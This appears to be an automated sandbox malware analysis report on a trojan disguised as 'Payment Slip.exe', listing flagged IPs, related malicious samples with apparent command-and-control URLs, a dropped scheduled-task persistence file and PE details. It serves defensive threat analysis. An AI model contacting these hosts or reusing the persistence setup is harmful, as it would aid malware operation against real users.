                                http://www.fontbureau.comPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.rspb.org.uk/wildlife/birdguide/name/Payment Slip.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers/?Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bThePayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers?Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.tiro.comPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.goodfont.co.krPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cThePayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.comPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cnPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-user.htmlPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp/Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleasePayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.fonts.comPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.deDPleasePayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.sakkal.comPayment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    45.207.75.185
                                                    www.b0ay.comSeychelles
                                                    136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                    34.102.136.180
                                                    interweavelife.comUnited States
                                                    15169GOOGLEUSfalse
                                                    198.54.117.211
                                                    parkingpage.namecheap.comUnited States
                                                    22612NAMECHEAP-NETUSfalse
                                                    45.39.212.49
                                                    www.00333v.comUnited States
                                                    18779EGIHOSTINGUStrue
                                                    75.102.22.71
                                                    yuumgo.academyUnited States
                                                    23352SERVERCENTRALUStrue

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:491436
                                                    Start date:27.09.2021
                                                    Start time:15:36:57
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 12m 47s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:Payment Slip.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:20
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@12/4@6/5
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 35.8% (good quality ratio 31.9%)
                                                    • Quality average: 70.2%
                                                    • Quality standard deviation: 33.1%
                                                    HCA Information:
                                                    • Successful, ratio: 90%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.82.210.154, 23.0.174.185, 23.0.174.200, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26
                                                    • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    15:38:04API Interceptor1x Sleep call for process: Payment Slip.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    198.54.117.211INVOICE.exeGet hashmaliciousBrowse
                                                    • www.tavolabread.com/m6rs/?Jp=Ev4sfRwqkh4SSKNh8W8MFuiC4TrIcDv7e/KX2LrGXgZBb6OKOxFbgnSdSjV8Tm+o3Xce&oHU=W4kPV
                                                    onxyPs4yG1MUPbN.exeGet hashmaliciousBrowse
                                                    • www.glavins.net/gjeh/?aN94=ANKFh7hChC0paMLgHXlMgiKAsiek2GO2vUBtvVW3jophVXv4GEryPp8ft0YXmyvVKcDK&Bt9p=L2JpHf_XVfnpGtQp
                                                    Shq9ms6iU1.exeGet hashmaliciousBrowse
                                                    • www.rochainrevsry.xyz/uytf/?fx=eL5rcIqGV1UEMBBy9TqlL7rAhwq64fGKSY4vpxzXbidcAXso5v1LQPz1albXoqgGFukYduFC4Q==&7n=ITfTuPJh_
                                                    HBW PAYMENT LIST FOR 2021,20212009.xlsxGet hashmaliciousBrowse
                                                    • www.narbaal.com/n092/?ixl0i0t=LAsnvovnFcCm9JytKicIeI6+3u1l2KuqwjFTJCz7afQ4adUdV1uRuoLXWRWtj7njbQm1Bg==&kb=-Z4LWJsPDRiPHr
                                                    Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeGet hashmaliciousBrowse
                                                    • www.itsready.support/uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc
                                                    Transfer_form_$157,890.xlsxGet hashmaliciousBrowse
                                                    • www.moneyfollowsaction.com/6mam/?zjgh6L=zGPdt6Y9J6c+1gkCgNB1H9jn1sJuxPe97d1XCx7HLaEBeIzn3US5NGFD0PF++lY3L+mDHQ==&zrn4=2dPLCFLHe
                                                    PO 2108013001.xlsxGet hashmaliciousBrowse
                                                    • www.boogerstv.com/p2io/?2d=0PK0MhF&wl=fW2NkW2m2880y7g2f/m+egXTc5dWq8qtohIQX9xRv3Snfsyr1ZmLXRti4FdN58+iKIl8Sw==
                                                    SOA.exeGet hashmaliciousBrowse
                                                    • www.draggonlng.com/bp39/?iPw=Hf664i41OcyZuQEaRyujaQrdEWDllUeswnJ6HoBxqiRENCMjc6UgD5i1BXf71cIMn2iX0tODkg==&UbiXG=DFNPnV-8h0klFrV
                                                    UZOM POWER.exeGet hashmaliciousBrowse
                                                    • www.acuityhealthcare.xyz/d8ak/?v48xY=ZqnTrl4UjBBxMB5oyJxabRC/UJhnXt/LXOTo9BJgmVL1CANHLw7OPTPtQlITPSy6jKgM&dL0hlJ=8pWdsDzHNnTd0b
                                                    QT 20210508.xlsxGet hashmaliciousBrowse
                                                    • www.boogerstv.com/p2io/?y0DT=8puD_pzxCVk&inbXu=fW2NkW2m2880y7g2f/m+egXTc5dWq8qtohIQX9xRv3Snfsyr1ZmLXRti4FdN58+iKIl8Sw==
                                                    iFF3wZaa3L.exeGet hashmaliciousBrowse
                                                    • www.frystmor.city/wufn/?6lfTx=eWg3OYopH8k+7OinLCzm5f6Ri2Qy6T4wPADeZnRzHvrrS4DPiaO0s8Md7rkLHhSxdcJrp8WlYw==&x2JpJ=LH2LaDz8NvQ
                                                    boss.exeGet hashmaliciousBrowse
                                                    • www.yourchanceisnow.com/p596/?WpTHN=7nzhbfhh&lH8dSd=81MFP6sCwxbyX2UX+PltFzjJpo3myRmrBpjJPp7IoIK74stpkX9zSew0V6wVgnNZAZtJ
                                                    PO-829ARTS-PI 2021-7-17.xlsxGet hashmaliciousBrowse
                                                    • www.cash4monero.com/dd2v/?9r0=y/cFEEbQanHGgm+rB04lcttnzrSXYs6v57T9dsIkSlgbGfVATDlLqmVkaRgGxrZWbw90dQ==&at=btILjJCH4
                                                    INVOICE.exeGet hashmaliciousBrowse
                                                    • www.andtheskywentred.com/p6f2/?fJEpdH6=GY405eLEo4cG48/rDBKONa1Zs3W3+DVbFHq4qfdULCcTg3q1TnUnB4n5SEbXekeOw+OJ&5j=2dNhChI
                                                    LPY15536W4.exeGet hashmaliciousBrowse
                                                    • www.frystmor.city/wufn/?4h=eWg3OYopH8k+7OinLCzm5f6Ri2Qy6T4wPADeZnRzHvrrS4DPiaO0s8Md7rkyYQyyTKVsp8WiLA==&k410=d8nPSBn8y43
                                                    OCmF0lc4vI.exeGet hashmaliciousBrowse
                                                    • www.technophiles.club/lvno/?5jd0=9r6he84&iZ=XnAVgJfS+P/zC7u/sETCETV2HgBVEiR1R11kJwiXkJ11CSqHuyB8edbF0/riBVkgssa0
                                                    c#U53f8).exeGet hashmaliciousBrowse
                                                    • www.virtual-box.cloud/gbwy/?1b2hkxU=RZKw4yRjpGWSm+4YgSdB7zP7Qvzzx7h3FGhBtxn5dtuEx0rsFclK/3Ih7dRDlZpEf5ms133wlQ==&9r=WfcTl68Hg8Mt_r
                                                    Reference No. # 3200025006.exeGet hashmaliciousBrowse
                                                    • www.theoldschool.house/ntfs/?2dWDG=6lX42hr8TrzLRjc&F48L2tc=TkQoNoe4xoiVVGblqbzRkSQ6i+KpIp09pfMTUeY9IEyyljJiGm1bx2aZXLiYsin6TwTL9JUMIA==
                                                    D7WIGqOZlm.exeGet hashmaliciousBrowse
                                                    • www.g-cleanpartners.in/dlc/distribution.php?pub=mixinte
                                                    Pdf MT103 - Remittance.pdf.exeGet hashmaliciousBrowse
                                                    • www.cannaceastore.com/s5cm/?kR-4q=UWaut+aXBhTnlPe660JFJBTDRLUs1JHiYE0giEBYXz4kjm/1a7a9dE4KALD3FKI/fXyg4BAl/g==&P0D=Atxturd

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    parkingpage.namecheap.comRFQ9003930 New Order.docGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    PURCHASE ORDER I 5083.exeGet hashmaliciousBrowse
                                                    • 198.54.117.218
                                                    RgproFrlyA.exeGet hashmaliciousBrowse
                                                    • 198.54.117.218
                                                    INVOICE.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211
                                                    NEW ORDER RE PO88224.PDF.EXEGet hashmaliciousBrowse
                                                    • 198.54.117.212
                                                    doc0490192021092110294.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211
                                                    SWIFT Transfer 103_0034OTT21000123_8238174530.PDF.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    SYsObQNkC1.exeGet hashmaliciousBrowse
                                                    • 198.54.117.216
                                                    SBGW#001232021.exeGet hashmaliciousBrowse
                                                    • 198.54.117.217
                                                    DHL_Sender_Documents_Details_021230900.xlsxGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    invoice.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    onxyPs4yG1MUPbN.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211
                                                    85fX3YfW9S.exeGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    Amended SO of 2000KVA400KVA.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    Updated SOA 210920.PDF.exeGet hashmaliciousBrowse
                                                    • 198.54.117.217
                                                    Z14S9Zolcyub1pd.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    sprogr.exeGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    EWVNnyXoRS.exeGet hashmaliciousBrowse
                                                    • 198.54.117.212
                                                    aT8aer3ybNvYpl3.exeGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    VUcg8XrQYa.exeGet hashmaliciousBrowse
                                                    • 198.54.117.216

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    XIAOZHIYUN1-AS-APICIDCNETWORKUSGbjE8AwfrzGet hashmaliciousBrowse
                                                    • 156.234.199.250
                                                    tI0W00k1vtGet hashmaliciousBrowse
                                                    • 156.234.1.246
                                                    6qWOL8Y2ce.exeGet hashmaliciousBrowse
                                                    • 103.48.133.171
                                                    vj9njvsEaDGet hashmaliciousBrowse
                                                    • 156.234.199.249
                                                    UPDATED e-STATEMENT..exeGet hashmaliciousBrowse
                                                    • 156.226.250.163
                                                    new product order.exeGet hashmaliciousBrowse
                                                    • 154.222.115.69
                                                    vbc.exeGet hashmaliciousBrowse
                                                    • 156.234.138.10
                                                    ordinazione d'acquisto_pdf______________________.exeGet hashmaliciousBrowse
                                                    • 154.207.58.160
                                                    HoGxvkYZd5Get hashmaliciousBrowse
                                                    • 156.234.204.175
                                                    UnHAnaAW.x86Get hashmaliciousBrowse
                                                    • 23.235.167.123
                                                    101F35094156E36CFB27CCE369EA6D4AFC7AA61EF7099.exeGet hashmaliciousBrowse
                                                    • 156.255.45.68
                                                    pay.exeGet hashmaliciousBrowse
                                                    • 156.255.235.234
                                                    Unpaid invoice.exeGet hashmaliciousBrowse
                                                    • 154.207.58.141
                                                    vbc.exeGet hashmaliciousBrowse
                                                    • 154.207.58.141
                                                    USD INV#1191189.xlsxGet hashmaliciousBrowse
                                                    • 154.207.58.141
                                                    KXM253rCpWGet hashmaliciousBrowse
                                                    • 156.234.1.254
                                                    dcMqJ2tQNWGet hashmaliciousBrowse
                                                    • 156.234.1.250
                                                    Kp6SDRr8xdGet hashmaliciousBrowse
                                                    • 156.234.123.194
                                                    #98765.exeGet hashmaliciousBrowse
                                                    • 156.241.53.153
                                                    HC1Y67xAaDGet hashmaliciousBrowse
                                                    • 156.253.80.9
                                                    NAMECHEAP-NETUSRFQ9003930 New Order.docGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    xccHIJ0vo7.exeGet hashmaliciousBrowse
                                                    • 104.219.248.26
                                                    $$$.exeGet hashmaliciousBrowse
                                                    • 162.213.255.42
                                                    JaUEDJDvt2.exeGet hashmaliciousBrowse
                                                    • 162.213.250.2
                                                    NEW PRODUCT DETAILS.docGet hashmaliciousBrowse
                                                    • 104.219.248.26
                                                    PURCHASE ORDER I 5083.exeGet hashmaliciousBrowse
                                                    • 198.54.117.218
                                                    Detalles del pago.pdf.exeGet hashmaliciousBrowse
                                                    • 198.54.122.60
                                                    Purchase_order_No_7839__.exeGet hashmaliciousBrowse
                                                    • 198.187.31.167
                                                    INVOICE.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211
                                                    Contract.exeGet hashmaliciousBrowse
                                                    • 63.250.38.200
                                                    PROFORMA-PDA 00GGTBGX00001A.xlsxGet hashmaliciousBrowse
                                                    • 198.54.116.133
                                                    NEW ORDER RE PO88224.PDF.EXEGet hashmaliciousBrowse
                                                    • 198.54.117.212
                                                    w3G51OGHm6.exeGet hashmaliciousBrowse
                                                    • 198.187.31.167
                                                    Payment_N#U00ba 2120779,pdf.exeGet hashmaliciousBrowse
                                                    • 198.54.122.60
                                                    TT Payment.exeGet hashmaliciousBrowse
                                                    • 63.250.38.200
                                                    Purchase_order_No_7839.exeGet hashmaliciousBrowse
                                                    • 198.187.31.167
                                                    uE4k5TUoUw.exeGet hashmaliciousBrowse
                                                    • 198.54.115.222
                                                    SWIFT Transfer 103_0034OTT21000123_8238174530.PDF.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    SYsObQNkC1.exeGet hashmaliciousBrowse
                                                    • 198.54.117.216
                                                    SBGW#001232021.exeGet hashmaliciousBrowse
                                                    • 198.54.117.217

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Slip.exe.log
                                                    Process:C:\Users\user\Desktop\Payment Slip.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1309
                                                    Entropy (8bit):5.3528008810928345
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                    MD5:542338C5A30B02E372089FECDC54D607
                                                    SHA1:6FAD29FF14686FC847B160E876C1E078333F6DCB
                                                    SHA-256:6CEA4E70947B962733754346CE49553BE3FB6E1FB3949C29EC22FA9CA4B7E7B6
                                                    SHA-512:FE4431305A8958C4940EB4AC65723A38DA6057C3D30F789C6EDDEBA8962B62E9C0583254E74740855027CF3AE9315E3001A7EEB54168073ED0D2AB9B1F05503A
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                    C:\Users\user\AppData\Local\Temp\tmp4F38.tmp
                                                    Process:C:\Users\user\Desktop\Payment Slip.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1641
                                                    Entropy (8bit):5.178650705953315
                                                    Encrypted:false
                                                    SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGVtn:cbhK79lNQR/rydbz9I3YODOLNdq3s
                                                    MD5:5F7B114B6FB5AC406F3D10CF29AE1D5E
                                                    SHA1:2D2FB8E8D550D1B3E0C8469F8A0027296AFBC76A
                                                    SHA-256:DE4A8877DFEB875E5EBB0BFF8F0E969C7B799B843F6C6E89C888EF49705B05C4
                                                    SHA-512:2E8DBD280B680538D41E733E3359B00DC455DF3B8F8A4866BBF85063170E4547F260AA2103AD0A982958FB4D43529576F3A2945D88FDE60CF2674517FA1DD7A0
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                    C:\Users\user\AppData\Roaming\uVxomBuy.exe
                                                    Process:C:\Users\user\Desktop\Payment Slip.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):850944
                                                    Entropy (8bit):6.771982201754698
                                                    Encrypted:false
                                                    SSDEEP:12288:pH/KsYkm4HeopInJAMDQr8QuSPaAZvS9KDfKrHI+3SIBtEy0dzfGJY5CTDuLtJcA:m8IFhXHbfVTmScyr6F+C8G
                                                    MD5:3D0D9C87EA732CAF417AFA0B8AF62267
                                                    SHA1:DFB1E57A9CF498310CB7287F4B5792CBCD8B3974
                                                    SHA-256:95B6BA2BE30399F87D20E021BEE29F0EB46773B67407F3ED9987D22610D5249D
                                                    SHA-512:E7DB51CD7BAF84CF65EBEAD15C3E56CA9E381866A4EDC7E945AFFE4F64F53BEF08519037A5E4FC2EF8F8034E91B240B5D3511A2CDEC08E308E8E473A7430A83B
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                    Reputation:unknown
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0..(...........G... ...`....@.. .......................`............@..................................F..O....`.......................@....................................................... ............... ..H............text... '... ...(.................. ..`.rsrc........`.......*..............@..@.reloc.......@......................@..B.................F......H...........HS..........0 ...&............................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                    C:\Users\user\AppData\Roaming\uVxomBuy.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\Payment Slip.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: [ZoneTransfer]....ZoneId=0

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.771982201754698
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:Payment Slip.exe
                                                    File size:850944
                                                    MD5:3d0d9c87ea732caf417afa0b8af62267
                                                    SHA1:dfb1e57a9cf498310cb7287f4b5792cbcd8b3974
                                                    SHA256:95b6ba2be30399f87d20e021bee29f0eb46773b67407f3ed9987d22610d5249d
                                                    SHA512:e7db51cd7baf84cf65ebead15c3e56ca9e381866a4edc7e945affe4f64f53bef08519037a5e4fc2ef8f8034e91b240b5d3511a2cdec08e308e8e473a7430a83b
                                                    SSDEEP:12288:pH/KsYkm4HeopInJAMDQr8QuSPaAZvS9KDfKrHI+3SIBtEy0dzfGJY5CTDuLtJcA:m8IFhXHbfVTmScyr6F+C8G
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0..(...........G... ...`....@.. .......................`............@................................

                                                    File Icon

                                                    Icon Hash:c6d2d2cadad2d2d2

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4b471a
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x61511504 [Mon Sep 27 00:49:08 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
